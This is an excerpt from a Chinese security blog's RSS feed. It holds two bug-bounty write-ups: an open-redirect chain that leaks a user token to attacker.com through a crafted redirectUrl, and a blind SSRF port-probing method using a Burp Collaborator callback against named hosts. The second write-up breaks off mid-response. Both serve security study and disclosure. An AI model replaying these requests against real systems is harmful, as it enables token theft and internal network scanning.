5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">浏览器跳转</span></p></li></ol><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">GET /dashboard?token=USER_TOKEN HTTP/1.1</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">Host: cs.money</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">存在漏洞时的请求流程（Open Redirect）</span></p><ol style="box-sizing: border-box;margin: 8px 0px;cursor: pointer;list-style-type: decimal;padding: 0px 0px 0px 25px;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">构造恶意登录 URL</span></p></li></ol><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">GET /login?redirectUrl=<a href="https://cs.money///attacker.com%2523&amp;callbackUrl=https://cs.money///attacker.com%2523" target="_blank">https://cs.money///attacker.com%2523&amp;callbackUrl=https://cs.money///attacker.com%2523</a> HTTP/1.1</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">Host: auth.dota.trade</span></code></pre><ol style="box-sizing: border-box;margin: 8px 0px;cursor: pointer;list-style-type: decimal;padding: 0px 0px 0px 25px;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1" start="2"><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">登录成功后的响应</span></p></li></ol><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">HTTP/1.1 302 Found</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">Location: <a href="https://cs.money///attacker.com" target="_blank">https://cs.money///attacker.com</a></span><span style="box-sizing: border-box;color: rgb(92, 99, 112);font-style: italic;cursor: pointer;line-height: 26px;"><span leaf="">#?token=USER_TOKEN</span></span></code></pre><ol style="box-sizing: border-box;margin: 8px 0px;cursor: pointer;list-style-type: decimal;padding: 0px 0px 0px 25px;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1" start="3"><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">浏览器解析（关键点） 浏览器会把：</span></p></li></ol><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf=""><a href="https://cs.money///attacker.com" target="_blank">https://cs.money///attacker.com</a></span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">解析为：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf=""><a href="https://attacker.com" target="_blank">https://attacker.com</a></span></code></pre><ol style="box-sizing: border-box;margin: 8px 0px;cursor: pointer;list-style-type: decimal;padding: 0px 0px 0px 25px;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1" start="4"><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">实际跳转请求</span></p></li></ol><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">GET /</span><span style="box-sizing: border-box;color: rgb(92, 99, 112);font-style: italic;cursor: pointer;line-height: 26px;"><span leaf="">#?token=USER_TOKEN HTTP/1.1</span></span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">Host: attacker.com</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这里重定向的思路就是添加三个斜杠---&gt;///</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">主要做一个记录</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">假期最后一天,优惠还有</span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100015755" data-s="300,640" type="block" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=d9e32935&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRyunHPBARIPUHTd7nNtkLtMoUibkJw2PLPspv1qHH1BGYDPiaaRjUBnAQE8GCKibKhyCfARo12LoNvr1ibDDwFbZrNIxbWrsSicUvbI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=9c279adb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRwnQCiaUCYZrjVVLgBB21wJxD5EKiaW8TTCboMoemTKkAA3iaLibfooUrmQicdicFY35P8YWibbnQiafib4OzRLOtDACkuLJyRjWnPNmOqk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/905607" target="_blank">https://hackerone.com/reports/905607</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=8859a7f6&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499404%26idx%3D1%26sn%3D5358483b915f29675284bf5124238704">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 05 May 2026 10:00:00 +0800</pubDate>
    </item>
    <item>
      <title>盲sssrf典型测试方法</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499397&amp;idx=1&amp;sn=7fce7b816f22db689ed012d92fe824b5</link>
      <description>盲sssrf典型测试方法正文敏感参数为url:GET /api/v1/http/default/raw?</description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-05-04 10:00</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=568ae4c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRygq0KxR618iccQFyXkdh8vZF6rEudz5eZm8aQhOwBdSArTJRVO5ak2NxEMNMSZL1EsX84Gt1IhVfvdZSOrVOu2CJbMdqJdO0yE%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">盲sssrf典型测试方法</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=01dc2ffb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRxkoQNia6nXLT7I2OhJKwAIa9z1QMENrZe4efWbkRsV1lvjWInwyeGBIXsoc2MlqP1MeJppicGskjBaVokpic7nWd4Sp3NOzqoOX4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">敏感参数为url:</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">GET /api/v1/http/default/raw?regex=%22service.name%22:/s%22(package-registry)%22&amp;statusCodeMax=200&amp;statusCodeMin=200&amp;url=<a href="http://p8yfvg6nige7z2ndagpf3v181z7pve.burpcollaborator.net:22" target="_blank">http://p8yfvg6nige7z2ndagpf3v181z7pve.burpcollaborator.net:22</a> HTTP/1.1</span><span leaf=""><br/></span><span leaf="">Host: fleet-status.app.elstc.co</span><span leaf=""><br/></span><span leaf="">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0</span><span leaf=""><br/></span><span leaf="">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span><span leaf=""><br/></span><span leaf="">Accept-Language: en-US,en;q=0.5</span><span leaf=""><br/></span><span leaf="">Accept-Encoding: gzip, deflate</span><span leaf=""><br/></span><span leaf="">Upgrade-Insecure-Requests: 1</span><span leaf=""><br/></span><span leaf="">Sec-Fetch-Dest: document</span><span leaf=""><br/></span><span leaf="">Sec-Fetch-Mode: navigate</span><span leaf=""><br/></span><span leaf="">Sec-Fetch-Site: none</span><span leaf=""><br/></span><span leaf="">Sec-Fetch-User: ?1</span><span leaf=""><br/></span><span leaf="">Cache-Control: max-age=0</span><span leaf=""><br/></span><span leaf="">Te: trailers</span><span leaf=""><br/></span><span leaf="">Connection: close</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">端口检测结果</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">若指定22 端口，返回：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">{</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;type&#34;</span></span><span leaf="">:</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;HTTP-RAW&#34;</span></span><span leaf="">,</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;status&#34;</span></span><span leaf="">:</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;WARNING&#34;</span></span><span leaf="">,</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;label&#34;</span></span><span leaf="">:</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;<a href="http://p8yfvg6nige7z2ndagpf3v181z7pve.burpcollaborator.net:22" target="_blank">http://p8yfvg6nige7z2ndagpf3v181z7pve.burpcollaborator.net:22</a>&#34;</span></span><span leaf="">,</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;message&#34;</span></span><span leaf="">:</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;timeout/host unreachable&#34;</span></span><span leaf="">}</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">端口未开放</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">若指定80 端口，返回：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">{</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;type&#34;</span></span><span leaf="">:</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;HTTP-RAW&#34;</span></span><span leaf="">,</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;status&#34;</span></span><span leaf="">:</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;FAILURE&#34;</span></span><span leaf="">,</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span 